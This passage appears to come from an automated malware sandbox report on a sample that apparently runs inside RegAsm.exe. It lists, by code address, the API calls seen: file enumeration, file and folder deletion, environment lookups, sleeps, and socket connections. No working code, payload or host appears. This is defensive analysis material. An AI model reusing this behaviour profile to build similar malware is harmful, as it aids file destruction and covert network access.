@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040751B
